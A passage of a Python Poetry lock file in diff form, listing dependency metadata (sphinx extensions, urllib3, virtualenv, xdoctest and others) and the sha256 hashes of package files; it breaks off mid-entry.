+category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +colorama = "*" +livereload = "*" +sphinx = "*" + +[package.extras] +test = ["pytest", "pytest-cov"] + +[[package]] +name = "sphinx-click" +version = "3.1.0" +description = "Sphinx extension that automatically documents click applications" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +click = ">=7.0" +docutils = "*" +sphinx = ">=2.0" + +[[package]] +name = "sphinxcontrib-applehelp" +version = "1.0.2" +description = "sphinxcontrib-applehelp is a sphinx extension which outputs Apple help books" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "sphinxcontrib-devhelp" +version = "1.0.2" +description = "sphinxcontrib-devhelp is a sphinx extension which outputs Devhelp document." +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "sphinxcontrib-htmlhelp" +version = "2.0.0" +description = "sphinxcontrib-htmlhelp is a sphinx extension which renders HTML help files" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest", "html5lib"] + +[[package]] +name = "sphinxcontrib-jsmath" +version = "1.0.1" +description = "A sphinx extension which renders display math in HTML via JavaScript" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +test = ["pytest", "flake8", "mypy"] + +[[package]] +name = "sphinxcontrib-qthelp" +version = "1.0.3" +description = "sphinxcontrib-qthelp is a sphinx extension which outputs QtHelp document." 
+category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "sphinxcontrib-serializinghtml" +version = "1.1.5" +description = "sphinxcontrib-serializinghtml is a sphinx extension which outputs \"serialized\" HTML files (json and pickle)." +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "stevedore" +version = "3.5.0" +description = "Manage dynamic plugins for Python applications" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +importlib-metadata = {version = ">=1.7.0", markers = "python_version < \"3.8\""} +pbr = ">=2.0.0,<2.1.0 || >2.1.0" + +[[package]] +name = "tokenize-rt" +version = "4.2.1" +description = "A wrapper around the stdlib `tokenize` which roundtrips." +category = "dev" +optional = false +python-versions = ">=3.6.1" + +[[package]] +name = "toml" +version = "0.10.2" +description = "Python Library for Tom's Obvious, Minimal Language" +category = "dev" +optional = false +python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*" + +[[package]] +name = "tomli" +version = "2.0.1" +description = "A lil' TOML parser" +category = "dev" +optional = false +python-versions = ">=3.7" + +[[package]] +name = "tornado" +version = "6.1" +description = "Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed." 
+category = "dev" +optional = false +python-versions = ">= 3.5" + +[[package]] +name = "typed-ast" +version = "1.4.3" +description = "a fork of Python 2 and 3 ast modules with type comment support" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "typeguard" +version = "2.13.3" +description = "Run-time type checker for Python" +category = "dev" +optional = false +python-versions = ">=3.5.3" + +[package.extras] +doc = ["sphinx-rtd-theme", "sphinx-autodoc-typehints (>=1.2.0)"] +test = ["pytest", "typing-extensions", "mypy"] + +[[package]] +name = "typing-extensions" +version = "4.2.0" +description = "Backported and Experimental Type Hints for Python 3.7+" +category = "main" +optional = false +python-versions = ">=3.7" + +[[package]] +name = "urllib3" +version = "1.26.9" +description = "HTTP library with thread-safe connection pooling, file post, and more." +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4" + +[package.extras] +brotli = ["brotlicffi (>=0.8.0)", "brotli (>=1.0.9)", "brotlipy (>=0.6.0)"] +secure = ["pyOpenSSL (>=0.14)", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "certifi", "ipaddress"] +socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"] + +[[package]] +name = "virtualenv" +version = "20.14.1" +description = "Virtual Python Environment builder" +category = "dev" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" + +[package.dependencies] +distlib = ">=0.3.1,<1" +filelock = ">=3.2,<4" +importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""} +platformdirs = ">=2,<3" +six = ">=1.9.0,<2" + +[package.extras] +docs = ["proselint (>=0.10.2)", "sphinx (>=3)", "sphinx-argparse (>=0.2.5)", "sphinx-rtd-theme (>=0.4.3)", "towncrier (>=21.3)"] +testing = ["coverage (>=4)", "coverage-enable-subprocess (>=1)", "flaky (>=3)", "pytest (>=4)", "pytest-env (>=0.6.2)", "pytest-freezegun (>=0.4.1)", "pytest-mock (>=2)", 
"pytest-randomly (>=1)", "pytest-timeout (>=1)", "packaging (>=20.0)"] + +[[package]] +name = "wrapt" +version = "1.14.1" +description = "Module for decorators, wrappers and monkey patching." +category = "main" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" + +[[package]] +name = "xdoctest" +version = "1.0.0" +description = "A rewrite of the builtin doctest module" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +colorama = {version = "*", optional = true, markers = "platform_system == \"Windows\" and extra == \"colors\""} +Pygments = {version = "*", optional = true, markers = "python_version >= \"3.5.0\" and extra == \"colors\""} +six = "*" + +[package.extras] +all = ["ipython", "ipython", "pygments", "pygments", "attrs", "cmake", "codecov", "colorama", "debugpy", "ipykernel", "ipykernel", "jedi", "jinja2", "jupyter-client", "jupyter-client", "jupyter-core", "nbconvert", "ninja", "pybind11", "pytest-cov", "pytest-cov", "pytest-cov", "pytest-cov", "pytest", "pytest", "pytest", "pytest", "pytest", "pytest", "scikit-build", "six", "typing"] +jupyter = ["ipython", "ipython", "attrs", "debugpy", "ipykernel", "ipykernel", "jedi", "jinja2", "jupyter-client", "jupyter-client", "jupyter-core", "nbconvert"] +optional = ["ipython", "ipython", "pygments", "pygments", "attrs", "colorama", "debugpy", "ipykernel", "ipykernel", "jedi", "jinja2", "jupyter-client", "jupyter-client", "jupyter-core", "nbconvert"] +colors = ["pygments", "pygments", "colorama"] +tests = ["cmake", "codecov", "ninja", "pybind11", "pytest-cov", "pytest-cov", "pytest-cov", "pytest-cov", "pytest", "pytest", "pytest", "pytest", "pytest", "pytest", "scikit-build", "typing"] + +[[package]] +name = "xlrd" +version = "2.0.1" +description = "Library for developers to extract data from Microsoft Excel (tm) .xls spreadsheet files" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, 
!=3.5.*" + +[package.extras] +build = ["wheel", "twine"] +docs = ["sphinx"] +test = ["pytest", "pytest-cov"] + +[[package]] +name = "zipp" +version = "3.8.0" +description = "Backport of pathlib-compatible object wrapper for zip files" +category = "main" +optional = false +python-versions = ">=3.7" + +[package.extras] +docs = ["sphinx", "jaraco.packaging (>=9)", "rst.linker (>=1.9)"] +testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "jaraco.itertools", "func-timeout", "pytest-black (>=0.3.7)", "pytest-mypy (>=0.9.1)"] + +[metadata] +lock-version = "1.1" +python-versions = "^3.7" +content-hash = "7b02fdc41561d5943de2187aad117b01f3a86551ce720f3e7204e35d5339fc1e" + +[metadata.files] +alabaster = [ + {file = "alabaster-0.7.12-py2.py3-none-any.whl", hash = "sha256:446438bdcca0e05bd45ea2de1668c1d9b032e1a9154c2c259092d77031ddd359"}, + {file = "alabaster-0.7.12.tar.gz", hash = "sha256:a661d72d58e6ea8a57f7a86e37d86716863ee5e92788398526d58b26a4e4dc02"}, +] +"aspy.refactor-imports" = [ + {file = "aspy.refactor_imports-2.3.0-py2.py3-none-any.whl", hash = "sha256:a60432fc0c0b948aa371da520b896ddcbbee71b1820eeda6d2c04f039bac13b9"}, + {file = "aspy.refactor_imports-2.3.0.tar.gz", hash = "sha256:5a7775b31e55a762f807c218a3f9f1a7ff1313d766605a301f2ed937cdfa242a"}, +] +atomicwrites = [ + {file = "atomicwrites-1.4.0-py2.py3-none-any.whl", hash = "sha256:6d1784dea7c0c8d4a5172b6c620f40b6e4cbfdf96d783691f2e1302a7b88e197"}, + {file = "atomicwrites-1.4.0.tar.gz", hash = "sha256:ae70396ad1a434f9c7046fd2dd196fc04b12f9e91ffb859164193be8b6168a7a"}, +] +attrs = [ + {file = "attrs-21.4.0-py2.py3-none-any.whl", hash = "sha256:2d27e3784d7a565d36ab851fe94887c5eccd6a463168875832a1be79c82828b4"}, + {file = "attrs-21.4.0.tar.gz", hash = "sha256:626ba8234211db98e869df76230a137c4c40a12d72445c45d5f5b716f076e2fd"}, +] +babel = [ + {file = "Babel-2.10.1-py3-none-any.whl", hash = 
"sha256:3f349e85ad3154559ac4930c3918247d319f21910d5ce4b25d439ed8693b98d2"}, + {file = "Babel-2.10.1.tar.gz", hash = "sha256:98aeaca086133efb3e1e2aad0396987490c8425929ddbcfe0550184fdc54cd13"}, +] +bandit = [ + {file = "bandit-1.7.4-py3-none-any.whl", hash = "sha256:412d3f259dab4077d0e7f0c11f50f650cc7d10db905d98f6520a95a18049658a"}, + {file = "bandit-1.7.4.tar.gz", hash = "sha256:2d63a8c573417bae338962d4b9b06fbc6080f74ecd955a092849e1e65c717bd2"}, +] +beautifulsoup4 = [ + {file = "beautifulsoup4-4.11.1-py3-none-any.whl", hash = "sha256:58d5c3d29f5a36ffeb94f02f0d786cd53014cf9b3b3951d42e0080d8a9498d30"}, + {file = "beautifulsoup4-4.11.1.tar.gz", hash = "sha256:ad9aa55b65ef2808eb405f46cf74df7fcb7044d5cbc26487f96eb2ef2e436693"}, +] +black = [ + {file = "black-22.3.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:2497f9c2386572e28921fa8bec7be3e51de6801f7459dffd6e62492531c47e09"}, + {file = "black-22.3.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:5795a0375eb87bfe902e80e0c8cfaedf8af4d49694d69161e5bd3206c18618bb"}, + {file = "black-22.3.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e3556168e2e5c49629f7b0f377070240bd5511e45e25a4497bb0073d9dda776a"}, + {file = "black-22.3.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:67c8301ec94e3bcc8906740fe071391bce40a862b7be0b86fb5382beefecd968"}, + {file = "black-22.3.0-cp310-cp310-win_amd64.whl", hash = "sha256:fd57160949179ec517d32ac2ac898b5f20d68ed1a9c977346efbac9c2f1e779d"}, + {file = "black-22.3.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:cc1e1de68c8e5444e8f94c3670bb48a2beef0e91dddfd4fcc29595ebd90bb9ce"}, + {file = "black-22.3.0-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6d2fc92002d44746d3e7db7cf9313cf4452f43e9ea77a2c939defce3b10b5c82"}, + {file = "black-22.3.0-cp36-cp36m-win_amd64.whl", hash = "sha256:a6342964b43a99dbc72f72812bf88cad8f0217ae9acb47c0d4f141a6416d2d7b"}, + {file = "black-22.3.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = 
"sha256:328efc0cc70ccb23429d6be184a15ce613f676bdfc85e5fe8ea2a9354b4e9015"}, + {file = "black-22.3.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:06f9d8846f2340dfac80ceb20200ea5d1b3f181dd0556b47af4e8e0b24fa0a6b"}, + {file = "black-22.3.0-cp37-cp37m-win_amd64.whl", hash = "sha256:ad4efa5fad66b903b4a5f96d91461d90b9507a812b3c5de657d544215bb7877a"}, + {file = "black-22.3.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e8477ec6bbfe0312c128e74644ac8a02ca06bcdb8982d4ee06f209be28cdf163"}, + {file = "black-22.3.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:637a4014c63fbf42a692d22b55d8ad6968a946b4a6ebc385c5505d9625b6a464"}, + {file = "black-22.3.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:863714200ada56cbc366dc9ae5291ceb936573155f8bf8e9de92aef51f3ad0f0"}, + {file = "black-22.3.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:10dbe6e6d2988049b4655b2b739f98785a884d4d6b85bc35133a8fb9a2233176"}, + {file = "black-22.3.0-cp38-cp38-win_amd64.whl", hash = "sha256:cee3e11161dde1b2a33a904b850b0899e0424cc331b7295f2a9698e79f9a69a0"}, + {file = "black-22.3.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:5891ef8abc06576985de8fa88e95ab70641de6c1fca97e2a15820a9b69e51b20"}, + {file = "black-22.3.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:30d78ba6bf080eeaf0b7b875d924b15cd46fec5fd044ddfbad38c8ea9171043a"}, + {file = "black-22.3.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ee8f1f7228cce7dffc2b464f07ce769f478968bfb3dd1254a4c2eeed84928aad"}, + {file = "black-22.3.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6ee227b696ca60dd1c507be80a6bc849a5a6ab57ac7352aad1ffec9e8b805f21"}, + {file = "black-22.3.0-cp39-cp39-win_amd64.whl", hash = "sha256:9b542ced1ec0ceeff5b37d69838106a6348e60db7b8fdd245294dc1d26136265"}, + {file = "black-22.3.0-py3-none-any.whl", hash = "sha256:bc58025940a896d7e5356952228b68f793cf5fcb342be703c3a2669a1488cb72"}, + {file = "black-22.3.0.tar.gz", hash = 
"sha256:35020b8886c022ced9282b51b5a875b6d1ab0c387b31a065b84db7c33085ca79"}, +] +bs4 = [ + {file = "bs4-0.0.1.tar.gz", hash = "sha256:36ecea1fd7cc5c0c6e4a1ff075df26d50da647b75376626cc186e2212886dd3a"}, +] +cached-property = [ + {file = "cached-property-1.5.2.tar.gz", hash = "sha256:9fa5755838eecbb2d234c3aa390bd80fbd3ac6b6869109bfc1b499f7bd89a130"}, + {file = "cached_property-1.5.2-py2.py3-none-any.whl", hash = "sha256:df4f613cf7ad9a588cc381aaf4a512d26265ecebd5eb9e1ba12f1319eb85a6a0"}, +] +certifi = [ + {file = "certifi-2022.5.18.1-py3-none-any.whl", hash = "sha256:f1d53542ee8cbedbe2118b5686372fb33c297fcd6379b050cca0ef13a597382a"}, + {file = "certifi-2022.5.18.1.tar.gz", hash = "sha256:9c5705e395cd70084351dd8ad5c41e65655e08ce46f2ec9cf6c2c08390f71eb7"}, +] +cffi = [ + {file = "cffi-1.15.0-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:c2502a1a03b6312837279c8c1bd3ebedf6c12c4228ddbad40912d671ccc8a962"}, + {file = "cffi-1.15.0-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:23cfe892bd5dd8941608f93348c0737e369e51c100d03718f108bf1add7bd6d0"}, + {file = "cffi-1.15.0-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:41d45de54cd277a7878919867c0f08b0cf817605e4eb94093e7516505d3c8d14"}, + {file = "cffi-1.15.0-cp27-cp27m-win32.whl", hash = "sha256:4a306fa632e8f0928956a41fa8e1d6243c71e7eb59ffbd165fc0b41e316b2474"}, + {file = "cffi-1.15.0-cp27-cp27m-win_amd64.whl", hash = "sha256:e7022a66d9b55e93e1a845d8c9eba2a1bebd4966cd8bfc25d9cd07d515b33fa6"}, + {file = "cffi-1.15.0-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:14cd121ea63ecdae71efa69c15c5543a4b5fbcd0bbe2aad864baca0063cecf27"}, + {file = "cffi-1.15.0-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:d4d692a89c5cf08a8557fdeb329b82e7bf609aadfaed6c0d79f5a449a3c7c023"}, + {file = "cffi-1.15.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:0104fb5ae2391d46a4cb082abdd5c69ea4eab79d8d44eaaf79f1b1fd806ee4c2"}, + {file = "cffi-1.15.0-cp310-cp310-macosx_11_0_arm64.whl", hash = 
"sha256:91ec59c33514b7c7559a6acda53bbfe1b283949c34fe7440bcf917f96ac0723e"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:f5c7150ad32ba43a07c4479f40241756145a1f03b43480e058cfd862bf5041c7"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:00c878c90cb53ccfaae6b8bc18ad05d2036553e6d9d1d9dbcf323bbe83854ca3"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:abb9a20a72ac4e0fdb50dae135ba5e77880518e742077ced47eb1499e29a443c"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a5263e363c27b653a90078143adb3d076c1a748ec9ecc78ea2fb916f9b861962"}, + {file = "cffi-1.15.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f54a64f8b0c8ff0b64d18aa76675262e1700f3995182267998c31ae974fbc382"}, + {file = "cffi-1.15.0-cp310-cp310-win32.whl", hash = "sha256:c21c9e3896c23007803a875460fb786118f0cdd4434359577ea25eb556e34c55"}, + {file = "cffi-1.15.0-cp310-cp310-win_amd64.whl", hash = "sha256:5e069f72d497312b24fcc02073d70cb989045d1c91cbd53979366077959933e0"}, + {file = "cffi-1.15.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:64d4ec9f448dfe041705426000cc13e34e6e5bb13736e9fd62e34a0b0c41566e"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2756c88cbb94231c7a147402476be2c4df2f6078099a6f4a480d239a8817ae39"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3b96a311ac60a3f6be21d2572e46ce67f09abcf4d09344c49274eb9e0bf345fc"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:75e4024375654472cc27e91cbe9eaa08567f7fbdf822638be2814ce059f58032"}, + {file = "cffi-1.15.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:59888172256cac5629e60e72e86598027aca6bf01fa2465bdb676d37636573e8"}, + {file = 
"cffi-1.15.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:27c219baf94952ae9d50ec19651a687b826792055353d07648a5695413e0c605"}, + {file = "cffi-1.15.0-cp36-cp36m-win32.whl", hash = "sha256:4958391dbd6249d7ad855b9ca88fae690783a6be9e86df65865058ed81fc860e"}, + {file = "cffi-1.15.0-cp36-cp36m-win_amd64.whl", hash = "sha256:f6f824dc3bce0edab5f427efcfb1d63ee75b6fcb7282900ccaf925be84efb0fc"}, + {file = "cffi-1.15.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:06c48159c1abed75c2e721b1715c379fa3200c7784271b3c46df01383b593636"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:c2051981a968d7de9dd2d7b87bcb9c939c74a34626a6e2f8181455dd49ed69e4"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:fd8a250edc26254fe5b33be00402e6d287f562b6a5b2152dec302fa15bb3e997"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:91d77d2a782be4274da750752bb1650a97bfd8f291022b379bb8e01c66b4e96b"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:45db3a33139e9c8f7c09234b5784a5e33d31fd6907800b316decad50af323ff2"}, + {file = "cffi-1.15.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:263cc3d821c4ab2213cbe8cd8b355a7f72a8324577dc865ef98487c1aeee2bc7"}, + {file = "cffi-1.15.0-cp37-cp37m-win32.whl", hash = "sha256:17771976e82e9f94976180f76468546834d22a7cc404b17c22df2a2c81db0c66"}, + {file = "cffi-1.15.0-cp37-cp37m-win_amd64.whl", hash = "sha256:3415c89f9204ee60cd09b235810be700e993e343a408693e80ce7f6a40108029"}, + {file = "cffi-1.15.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:4238e6dab5d6a8ba812de994bbb0a79bddbdf80994e4ce802b6f6f3142fcc880"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:0808014eb713677ec1292301ea4c81ad277b6cdf2fdd90fd540af98c0b101d20"}, + {file = 
"cffi-1.15.0-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:57e9ac9ccc3101fac9d6014fba037473e4358ef4e89f8e181f8951a2c0162024"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8b6c2ea03845c9f501ed1313e78de148cd3f6cad741a75d43a29b43da27f2e1e"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:10dffb601ccfb65262a27233ac273d552ddc4d8ae1bf93b21c94b8511bffe728"}, + {file = "cffi-1.15.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:786902fb9ba7433aae840e0ed609f45c7bcd4e225ebb9c753aa39725bb3e6ad6"}, + {file = "cffi-1.15.0-cp38-cp38-win32.whl", hash = "sha256:da5db4e883f1ce37f55c667e5c0de439df76ac4cb55964655906306918e7363c"}, + {file = "cffi-1.15.0-cp38-cp38-win_amd64.whl", hash = "sha256:181dee03b1170ff1969489acf1c26533710231c58f95534e3edac87fff06c443"}, + {file = "cffi-1.15.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:45e8636704eacc432a206ac7345a5d3d2c62d95a507ec70d62f23cd91770482a"}, + {file = "cffi-1.15.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:31fb708d9d7c3f49a60f04cf5b119aeefe5644daba1cd2a0fe389b674fd1de37"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:6dc2737a3674b3e344847c8686cf29e500584ccad76204efea14f451d4cc669a"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:74fdfdbfdc48d3f47148976f49fab3251e550a8720bebc99bf1483f5bfb5db3e"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ffaa5c925128e29efbde7301d8ecaf35c8c60ffbcd6a1ffd3a552177c8e5e796"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3f7d084648d77af029acb79a0ff49a0ad7e9d09057a9bf46596dac9514dc07df"}, + {file = "cffi-1.15.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = 
"sha256:ef1f279350da2c586a69d32fc8733092fd32cc8ac95139a00377841f59a3f8d8"}, + {file = "cffi-1.15.0-cp39-cp39-win32.whl", hash = "sha256:2a23af14f408d53d5e6cd4e3d9a24ff9e05906ad574822a10563efcef137979a"}, + {file = "cffi-1.15.0-cp39-cp39-win_amd64.whl", hash = "sha256:3773c4d81e6e818df2efbc7dd77325ca0dcb688116050fb2b3011218eda36139"}, + {file = "cffi-1.15.0.tar.gz", hash = "sha256:920f0d66a896c2d99f0adbb391f990a84091179542c205fa53ce5787aff87954"}, +] +cfgv = [ + {file = "cfgv-3.3.1-py2.py3-none-any.whl", hash = "sha256:c6a0883f3917a037485059700b9e75da2464e6c27051014ad85ba6aaa5884426"}, + {file = "cfgv-3.3.1.tar.gz", hash = "sha256:f5a830efb9ce7a445376bb66ec94c638a9787422f96264c98edc6bdeed8ab736"}, +] +chardet = [ + {file = "chardet-3.0.4-py2.py3-none-any.whl", hash = "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691"}, + {file = "chardet-3.0.4.tar.gz", hash = "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae"}, +] +charset-normalizer = [ + {file = "charset-normalizer-2.0.12.tar.gz", hash = "sha256:2857e29ff0d34db842cd7ca3230549d1a697f96ee6d3fb071cfa6c7393832597"}, + {file = "charset_normalizer-2.0.12-py3-none-any.whl", hash = "sha256:6881edbebdb17b39b4eaaa821b438bf6eddffb4468cf344f09f89def34a8b1df"}, +] +click = [ + {file = "click-8.1.3-py3-none-any.whl", hash = "sha256:bb4d8133cb15a609f44e8213d9b391b0809795062913b383c62be0ee95b1db48"}, + {file = "click-8.1.3.tar.gz", hash = "sha256:7682dc8afb30297001674575ea00d1814d808d6a36af415a82bd481d37ba7b8e"}, +] +colorama = [ + {file = "colorama-0.4.4-py2.py3-none-any.whl", hash = "sha256:9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2"}, + {file = "colorama-0.4.4.tar.gz", hash = "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"}, +] +coverage = [ + {file = "coverage-6.4.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f1d5aa2703e1dab4ae6cf416eb0095304f49d004c39e9db1d86f57924f43006b"}, + {file = 
"coverage-6.4.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:4ce1b258493cbf8aec43e9b50d89982346b98e9ffdfaae8ae5793bc112fb0068"}, + {file = "coverage-6.4.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83c4e737f60c6936460c5be330d296dd5b48b3963f48634c53b3f7deb0f34ec4"}, + {file = "coverage-6.4.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84e65ef149028516c6d64461b95a8dbcfce95cfd5b9eb634320596173332ea84"}, + {file = "coverage-6.4.1-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f69718750eaae75efe506406c490d6fc5a6161d047206cc63ce25527e8a3adad"}, + {file = "coverage-6.4.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e57816f8ffe46b1df8f12e1b348f06d164fd5219beba7d9433ba79608ef011cc"}, + {file = "coverage-6.4.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:01c5615d13f3dd3aa8543afc069e5319cfa0c7d712f6e04b920431e5c564a749"}, + {file = "coverage-6.4.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:75ab269400706fab15981fd4bd5080c56bd5cc07c3bccb86aab5e1d5a88dc8f4"}, + {file = "coverage-6.4.1-cp310-cp310-win32.whl", hash = "sha256:a7f3049243783df2e6cc6deafc49ea123522b59f464831476d3d1448e30d72df"}, + {file = "coverage-6.4.1-cp310-cp310-win_amd64.whl", hash = "sha256:ee2ddcac99b2d2aec413e36d7a429ae9ebcadf912946b13ffa88e7d4c9b712d6"}, + {file = "coverage-6.4.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:fb73e0011b8793c053bfa85e53129ba5f0250fdc0392c1591fd35d915ec75c46"}, + {file = "coverage-6.4.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:106c16dfe494de3193ec55cac9640dd039b66e196e4641fa8ac396181578b982"}, + {file = "coverage-6.4.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:87f4f3df85aa39da00fd3ec4b5abeb7407e82b68c7c5ad181308b0e2526da5d4"}, + {file = 
"coverage-6.4.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:961e2fb0680b4f5ad63234e0bf55dfb90d302740ae9c7ed0120677a94a1590cb"}, + {file = "coverage-6.4.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:cec3a0f75c8f1031825e19cd86ee787e87cf03e4fd2865c79c057092e69e3a3b"}, + {file = "coverage-6.4.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:129cd05ba6f0d08a766d942a9ed4b29283aff7b2cccf5b7ce279d50796860bb3"}, + {file = "coverage-6.4.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:bf5601c33213d3cb19d17a796f8a14a9eaa5e87629a53979a5981e3e3ae166f6"}, + {file = "coverage-6.4.1-cp37-cp37m-win32.whl", hash = "sha256:269eaa2c20a13a5bf17558d4dc91a8d078c4fa1872f25303dddcbba3a813085e"}, + {file = 